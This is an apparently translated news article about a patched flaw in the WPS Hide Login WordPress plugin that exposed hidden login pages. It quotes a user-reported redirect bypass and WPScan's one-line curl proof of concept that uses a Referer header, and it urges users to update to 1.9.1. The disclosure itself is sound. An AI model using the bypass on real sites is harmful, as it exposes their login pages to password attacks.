The WPS Hide Login WordPress plugin recently patched a vulnerability that exposed users’ secret login pages. This vulnerability allows malicious hackers to defeat the purpose of the plug-in (hide the login page), which can expose the site to attacks that unlock passwords and logins.
In essence, the vulnerability completely violates the intended purpose of the plugin itself, which is to hide the WordPress login page.
WPS hidden login
The WPS Hide Login security plugin prevents hackers from trying to access the WordPress site by hiding the administrator login page and making the wp-admin directory inaccessible.
More than one million websites use WPS hidden login to add a deeper level of security.
advertise
Keep reading below
Defeating hackers and hacking bots that attack the default login page of a WordPress site does not actually require plugins. An easier way to accomplish the same thing is to install WordPress into a directory folder with a random name.
What happened was that the login page hacker bot would look for the normal login page, but it did not exist in the expected URL location.
The login page is actually hidden in /random-file-name/wp-login.php instead of in /wp-login.php.
Login bots always assume that the WordPress login page is in the default location, so they never look for it elsewhere.
advertise
Keep reading below
The WPS hidden login WordPress plugin is very useful for sites that have installed WordPress in the root directory, such as example.com/.
Vulnerability report
The vulnerability has been publicly reported on the support page of the plugin.
Users of this plugin report that if the main homepage is redirected, then adding a specific file name to the redirected URL will expose the URL of the hidden login page.
They explained it like this:
“For example, for the following domain: sub.domain.com If domain.com is redirected to sub.domain.com, the following bypass exists:
Enter the URL domain.com and add /wp-admin/options.php and then it redirects to sub.domain.com/changedloginurl, you will see the login URL and you can log in. “
Proof of concept released on secure site
The WordPress security organization WPScan released a proof of concept. The proof of concept is an explanation that shows that the vulnerability is real.
The security researchers published:
“The plug-in has an error, it allows to set a random quotation string and send it to /wp-admin/options.php as an unauthenticated user.
Proof of concept
curl –referer “something” -sIXGET https://example.com/wp-admin/options.php
HTTP/2 302 “
The National Vulnerability Database of the US government rated the vulnerability as a high-level exploit, giving it a score of 7.5 on a scale of 1 to 10, where 10 points represent the highest threat level.
advertise
Keep reading below
WPS hidden login vulnerability has been patched
The publisher of the WPS Hide Login plugin updated the plugin by patching the vulnerability.
This patch is included in version 1.9.1.
According to WPS login update log:
“1.9.1
Fix: Bypass the security issue and allow unauthenticated users to set a random quote string through curl request to get the login page.Set a random quote string through curl request to access the page. “
Users of affected plugins may wish to consider updating to the latest version 1.9.1 to effectively hide their login page.
Citation
U.S. Government National Vulnerability Database
WPScan Report of WPS Hidden Login Vulnerability
WPS Hidden Login <1.9.1-Use Referer-Header to bypass protection
advertise
Keep reading below
